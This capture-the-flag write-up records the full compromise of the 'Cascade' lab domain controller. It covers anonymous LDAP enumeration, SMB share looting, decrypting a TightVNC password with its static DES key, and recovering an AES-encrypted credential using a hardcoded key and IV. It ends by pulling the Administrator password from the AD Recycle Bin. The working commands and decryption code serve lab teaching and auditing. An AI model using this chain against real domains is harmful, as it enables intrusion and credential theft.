Cascade
IP: 10.10.10.182 | Domain: cascade.local | DC: CASC-DC1
Environment Setup
export IP=10.10.10.182
export VPN=$(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1)
echo "10.10.10.182 cascade.local CASC-DC1" | sudo tee -a /etc/hosts
Step 1 — Port Scanning
Why: Identify all open services. On Windows, the combination of LDAP, Kerberos, and SMB immediately confirms a Domain Controller. Knowing the exact OS build helps estimate the likelihood of legacy misconfigurations.
nmap -sCV -p- --min-rate 5000 $IP -oN nmap.out
Output:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open msrpc
Key findings:
- Confirmed Domain Controller — Kerberos, LDAP, DNS all present
- WinRM (5985) open — valid creds will give a shell directly
- No HTTP — pure AD attack surface
- OS: Windows Server 2008 R2 — legacy build, check for LDAP anonymous bind
Step 2 — LDAP User Enumeration
Why: Older AD environments often permit anonymous LDAP binds. Enumerating all user objects without credentials is the fastest way to map targets. Legacy attributes like cascadeLegacyPwd are non-standard — they survive when admins forget to scrub deprecated fields from user objects.
ldapsearch -x -H ldap://$IP -b "DC=cascade,DC=local" "(objectClass=user)" | grep -E "sAMAccountName|cascadeLegacyPwd"
Output:
sAMAccountName: r.thompson
cascadeLegacyPwd: <REDACTED_BASE64>
Key findings:
- Anonymous LDAP bind permitted — full user enumeration without credentials
- cascadeLegacyPwd attribute found on r.thompson — base64-encoded legacy password
- Decoding the attribute directly reveals:
r.thompson:<REDACTED>
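An auditor who wants to find attributes like cascadeLegacyPwd before an attacker does can run the same anonymous ldapsearch and parse its LDIF output for custom password-like attributes. The script below is an added example, not part of the original writeup: it parses LDIF (comments, folded lines, and the `attr:: base64` form ldapsearch emits), flags attributes whose names contain "pwd" or "passw" but are not standard AD schema, and reports a masked plaintext so the finding can go into a ticket without the credential. The LDIF sample and the allow-list of known attribute names are constructed for this example.

```python
import base64
import re

# Constructed LDIF in the shape of `ldapsearch -x -b "DC=cascade,DC=local" "(objectClass=user)"` output.
# The base64 value below is invented for this example; it is not the real attribute from the box.
SAMPLE_LDIF = """\
# r.thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
cascadeLegacyPwd: ZXhhbXBsZS1sZWdhY3ktcHc=

# s.smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: s.smith
description:: SVQgc3VwcG9ydA==

"""

# Standard AD attributes whose names contain "pwd"; any other match is custom schema (assumed list).
KNOWN_PWD_ATTRS = {"pwdlastset", "badpwdcount", "maxpwdage", "minpwdage",
                   "pwdhistorylength", "pwdproperties", "unicodepwd", "lockoutthreshold"}
SUSPECT = re.compile(r"pwd|passw", re.IGNORECASE)


def parse_ldif(text):
    """Return one {attribute: [values]} dict per LDIF entry.

    Handles comment lines, folded continuation lines (leading space) and the
    `attr:: <base64>` encoding ldapsearch uses for non-printable values.
    """
    entries, current, lines = [], {}, []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:          # folded line: append to the previous one
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    for line in lines + [""]:                      # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        name, _, value = line.partition(":")
        if value.startswith(":"):                  # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(name.strip(), []).append(value)
    return entries


def looks_like_base64(s):
    return bool(re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s)) and len(s) % 4 == 0


def find_legacy_password_attrs(ldif_text):
    """Return (sAMAccountName, attribute, masked_value) for custom password-like attributes.

    Base64 values are decoded so the report shows the plaintext length, which is enough
    for an auditor to confirm a stored cleartext credential without copying it.
    """
    findings = []
    for entry in parse_ldif(ldif_text):
        sam = entry.get("sAMAccountName", ["?"])[0]
        for attr, values in entry.items():
            if SUSPECT.search(attr) and attr.lower() not in KNOWN_PWD_ATTRS:
                for v in values:
                    plain = base64.b64decode(v).decode("utf-8", "replace") if looks_like_base64(v) else v
                    findings.append((sam, attr, plain[0] + "*" * (len(plain) - 1)))
    return findings


if __name__ == "__main__":
    for sam, attr, masked in find_legacy_password_attrs(SAMPLE_LDIF):
        print(f"{sam}: {attr} holds a decodable secret ({masked})")
```

Feed it real output with `ldapsearch ... > users.ldif` and `find_legacy_password_attrs(open("users.ldif").read())`; the fix on the directory side is to remove the custom attribute values and, ideally, the schema extension itself, since anything readable by an anonymous bind is readable by everyone.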
Step 3 — SMB Enumeration as r.thompson
Why: With valid domain credentials, enumerate every accessible share. IT-related shares like Data frequently contain config files, scripts, and automation artefacts left behind by admins — especially on legacy environments where housekeeping is poor.
nxc smb $IP -u r.thompson -p '<REDACTED>' --shares
smbclient //$IP/Data -U "cascade.local/r.thompson%<REDACTED>" -c "recurse ON; prompt OFF; mget *"
Output:
Share Permissions
----- -----------
ADMIN$
C$
Data READ
IPC$ READ
NETLOGON READ
SYSVOL READ
Key findings:
- Data share readable — contains IT department files
- Found: \IT\Temp\s.smith\VNC Install.reg — TightVNC registry export with encrypted password
- VNC password stored as hex-encoded string, encrypted with a well-known static DES key
Step 4 — VNC Password Decryption
Why: TightVNC encrypts stored passwords using a static, publicly-known DES key (e84ad660c4721ae0). The hex value from the registry file can be decrypted deterministically — no cracking needed.
from Crypto.Cipher import DES  # pycryptodome

# Fixed key from vncpasswd, with the bits of each byte reversed (VNC's d3des quirk),
# which is the form a standard DES library needs
key = bytes.fromhex("e84ad660c4721ae0")
enc = bytes.fromhex("<REDACTED_HEX>")  # "Password"=hex:... value from VNC Install.reg (8 bytes)
cipher = DES.new(key, DES.MODE_ECB)    # a single 8-byte block, so ECB equals CBC with a zero IV
print(cipher.decrypt(enc).rstrip(b'\x00').decode())  # VNC NUL-pads passwords shorter than 8 chars
Output:
<REDACTED>
Key findings:
- Credential recovered: s.smith:<REDACTED>
- Static DES key is documented in public VNC security research — instant decryption
- s.smith has WinRM access based on open port 5985
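To show where the e84ad660c4721ae0 key comes from and how the encrypted bytes are pulled out of a registry export, here is an added example that is not part of the original writeup. It parses a .reg file (including the backslash-continued hex lists Windows writes), extracts the TightVNC `Password` value, and derives the standard-library DES key by bit-reversing each byte of the fixed key from vncpasswd.c ({23, 82, 107, 6, 35, 78, 88, 7}). The registry excerpt and its hex bytes are constructed; the DES step itself is the same call used in Step 4 and needs pycryptodome, so it is kept in a separate function.

```python
import re

# Constructed excerpt in the shape of a TightVNC registry export such as VNC Install.reg.
# The hex password bytes are invented; the real file's value is not reproduced here.
SAMPLE_REG = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"Password"=hex:6b,cf,2d,4b,\\
  24,3a,8a,de
"UseVncAuthentication"=dword:00000001
"""

# Fixed DES key hardcoded in vncpasswd.c (decimal byte values as they appear in the source)
VNCPASSWD_KEY = bytes([23, 82, 107, 6, 35, 78, 88, 7])


def reg_values(text):
    """Parse a .reg export into {(key_path, value_name): raw_value}, joining continued hex lists."""
    values, key, pending = {}, None, ""
    for line in text.splitlines():
        if pending:                                 # continuation of a "hex:" list
            line = pending + line.strip()
            pending = ""
        if line.endswith("\\"):                     # trailing backslash: value continues
            pending = line[:-1]
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif line.startswith('"') and "=" in line:
            name, _, raw = line.partition("=")
            values[(key, name.strip('"'))] = raw
    return values


def vnc_password_bytes(text):
    """Return the 8 encrypted password bytes from a TightVNC server export, or None if absent."""
    for (key, name), raw in reg_values(text).items():
        if key and key.lower().endswith("tightvnc\\server") and name == "Password" and raw.startswith("hex:"):
            return bytes.fromhex(raw[4:].replace(",", ""))
    return None


def reverse_bits(b):
    """Reverse the bit order of one byte (0x17 -> 0xe8)."""
    return int(f"{b:08b}"[::-1], 2)


def standard_des_key():
    """VNC's d3des consumes key bits in reversed order per byte, so a standard DES
    implementation must be given the bit-reversed key to produce the same result."""
    return bytes(reverse_bits(b) for b in VNCPASSWD_KEY)


def decrypt_vnc_password(enc):
    """DES-ECB over the single 8-byte block with the bit-reversed key; requires pycryptodome."""
    from Crypto.Cipher import DES
    return DES.new(standard_des_key(), DES.MODE_ECB).decrypt(enc).rstrip(b"\x00").decode()


if __name__ == "__main__":
    # A real export is UTF-16 with a BOM: open(path, encoding="utf-16").read()
    print("standard DES key:", standard_des_key().hex())
    print("encrypted bytes :", vnc_password_bytes(SAMPLE_REG).hex())
```

Because the key is fixed and public, any export of the TightVNC server key (backup, GPO, a stray .reg on a share) is equivalent to the plaintext; the only durable fix is to stop relying on VNC password authentication and to treat such exports as secrets when scanning shares.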
Step 5 — WinRM Foothold as s.smith
Why: Port 5985 was open and s.smith is a domain user. Evil-WinRM gives an interactive PowerShell session directly on the DC without triggering noisy lateral movement techniques.
evil-winrm -i $IP -u s.smith -p '<REDACTED>'
Output:
*Evil-WinRM* PS C:\Users\s.smith\Documents>
Key findings:
- Foothold established as cascade\s.smith
- Audit$ share now accessible — contains CascAudit.exe and Audit.db
Step 6 — SQLite Credential Extraction
Why: The Audit$ share contains a SQLite database used by a custom audit tool. Databases created for internal tooling frequently store credentials in minimally-protected form — often just AES-encrypted with the key hardcoded in the accompanying binary.
# Download from Audit$ share
smbclient //$IP/Audit$ -U "cascade.local/s.smith%<REDACTED>" -c "mget *"
sqlite3 Audit.db
.tables
SELECT * FROM Ldap;
Output:
uname | ArkSvc
pwd | <REDACTED_BASE64_AES>
domain | cascade.local
Key findings:
- ArkSvc credentials stored as AES-encrypted base64 in the Ldap table
- CascAudit.exe and CascCrypto.dll also present — key and IV will be hardcoded
Step 7 — Reverse Engineering CascCrypto.dll
Why: The encryption key and IV must exist somewhere in the binary for the application to function. .NET assemblies are trivially decompiled — the AES key and IV are recoverable as plaintext strings in the decompiled source.
# Decompile with dnSpy (ILSpy also works), or pull string literals directly.
# .NET stores string literals as UTF-16, so strings must scan 16-bit little-endian text:
strings -e l CascCrypto.dll | grep -iE "key|iv|aes"
Output:
c4scadek3y654321 # AES key
1tdyjCbY1Ix49842 # IV
Key findings:
- AES-128 CBC, key and IV hardcoded as UTF-8 strings in the DLL
- Full decryption now possible without any brute-force
Step 8 — Decrypt ArkSvc Password
Why: With the AES key and IV recovered, decrypting the credential from the SQLite database is a single Python call.
from Crypto.Cipher import AES  # pycryptodome
from Crypto.Util.Padding import unpad
import base64
key = b"c4scadek3y654321"  # 16 bytes, hence AES-128
iv = b"1tdyjCbY1Ix49842"
enc = base64.b64decode("<REDACTED_BASE64_AES>")  # pwd column of the Ldap table
cipher = AES.new(key, AES.MODE_CBC, iv)
# .NET's Aes defaults to PKCS#7 padding; strip it properly instead of rstrip(b'\x10'),
# which only works when the padding happens to be a full 16-byte block
print(unpad(cipher.decrypt(enc), AES.block_size).decode())
Output:
<REDACTED>
Key findings:
- Credential recovered: ArkSvc:<REDACTED>
- ArkSvc is a service account — enumerate its group memberships immediately
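The following added example (not code from the writeup or from the CascAudit tool) ties Steps 6 and 8 together from a reviewer's point of view: it builds an in-memory SQLite table in the shape of the Ldap table, pulls each stored credential out and checks it is block-aligned for AES, and then contrasts strict PKCS#7 unpadding with the rstrip approach to show the case where the latter silently returns the wrong value. The table schema, the ciphertext blob and the two decrypted blocks are constructed; the key and IV in `decrypt_record` are the ones recovered in Step 7, and that function is the only part that needs pycryptodome.

```python
import base64
import sqlite3

# Constructed stand-in for Audit.db: one Ldap row with the columns the writeup shows.
# The pwd value is an invented 16-byte blob, not the box's real ciphertext.
FAKE_CIPHERTEXT = bytes(range(16))


def build_sample_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Ldap (uname TEXT, pwd TEXT, domain TEXT)")
    db.execute("INSERT INTO Ldap VALUES (?, ?, ?)",
               ("ArkSvc", base64.b64encode(FAKE_CIPHERTEXT).decode(), "cascade.local"))
    return db


def stored_credentials(db):
    """Return (uname, domain, ciphertext) per Ldap row, rejecting blobs that are not whole AES blocks."""
    rows = []
    for uname, pwd, domain in db.execute("SELECT uname, pwd, domain FROM Ldap"):
        blob = base64.b64decode(pwd)
        if len(blob) % 16:
            raise ValueError(f"{uname}: {len(blob)} bytes is not a whole number of AES blocks")
        rows.append((uname, domain, blob))
    return rows


def pkcs7_unpad(data, block_size=16):
    """Strict PKCS#7 unpadding, matching what .NET's Aes (default PaddingMode.PKCS7) produces."""
    if not data or len(data) % block_size:
        raise ValueError("data is not block aligned")
    n = data[-1]
    if not 1 <= n <= block_size or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding")
    return data[:-n]


def naive_unpad(data):
    """The rstrip(b'\\x10') shortcut: correct only when the padding is a full block of 0x10."""
    return data.rstrip(b"\x10")


def decrypt_record(blob, key=b"c4scadek3y654321", iv=b"1tdyjCbY1Ix49842"):
    """AES-128-CBC with the hardcoded key/IV from Step 7, then strict unpadding; needs pycryptodome."""
    from Crypto.Cipher import AES
    return pkcs7_unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(blob)).decode()


# Constructed decrypted blocks: a 13-byte secret is padded with three 0x03 bytes,
# a 16-byte secret gets a whole extra block of 0x10
PLAIN_13 = b"x" * 13 + b"\x03" * 3
PLAIN_16 = b"x" * 16 + b"\x10" * 16


if __name__ == "__main__":
    for uname, domain, blob in stored_credentials(build_sample_db()):
        print(f"{domain}\\{uname}: {len(blob)}-byte AES-CBC ciphertext stored reversibly")
    print("strict :", pkcs7_unpad(PLAIN_13))   # b'xxxxxxxxxxxxx'
    print("naive  :", naive_unpad(PLAIN_13))   # padding left in place
```

The design lesson for the tool's authors is the same regardless of padding: a service password that an application can decrypt with material shipped inside its own binary is recoverable by anyone who can read both files, so the credential should live in a per-host protected store (for example DPAPI on Windows) or be replaced by a managed service account rather than a reversible blob in a shared database.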
Step 9 — AD Recycle Bin Privilege Escalation
Why: ArkSvc is a member of the AD Recycle Bin group. This group can read deleted Active Directory objects — including all attributes. A previously deleted TempAdmin account had its cascadeLegacyPwd attribute preserved in the recycle bin, and shared the same password as the built-in Administrator account.
# In Evil-WinRM as ArkSvc
evil-winrm -i $IP -u ArkSvc -p '<REDACTED>'
Get-ADObject -SearchBase "CN=Deleted Objects,DC=cascade,DC=local" `
-Filter {ObjectClass -eq "user"} `
-IncludeDeletedObjects `
-Properties * | Select Name, cascadeLegacyPwd
Output:
Name : TempAdmin
cascadeLegacyPwd : <REDACTED_BASE64>
Key findings:
- TempAdmin deleted object retrieved with all attributes intact
- cascadeLegacyPwd on TempAdmin decodes to Administrator's password
- AD Recycle Bin preserves all object attributes — never assume deleted == gone
Step 10 — Domain Admin
Why: With the Administrator's password recovered, PSExec or WinRM grants a SYSTEM shell on the Domain Controller.
evil-winrm -i $IP -u Administrator -p '<REDACTED>'
Output:
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
hostname: CASC-DC1
🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED
Credentials
r.thompson:<REDACTED> # LDAP cascadeLegacyPwd attribute
s.smith:<REDACTED> # VNC registry DES decrypt
ArkSvc:<REDACTED> # SQLite AES decrypt
TempAdmin:<REDACTED> # AD Recycle Bin
Administrator:<REDACTED> # Same as TempAdmin
Full Attack Chain
Anonymous LDAP bind → cascadeLegacyPwd (r.thompson)
└─ SMB Data share (READ) → VNC Install.reg (s.smith hex-encrypted)
└─ VNC DES decrypt (static key) → s.smith:<REDACTED>
└─ WinRM foothold → Audit$ share (CascAudit.exe + Audit.db)
└─ SQLite Ldap table → ArkSvc AES-encrypted creds
└─ RE CascCrypto.dll → AES key + IV
└─ AES decrypt → ArkSvc:<REDACTED>
└─ AD Recycle Bin → TempAdmin.cascadeLegacyPwd
└─ base64 decode → Administrator:<REDACTED>
🏴 DOMAIN ADMIN
© 0xNRG — Cascade pwned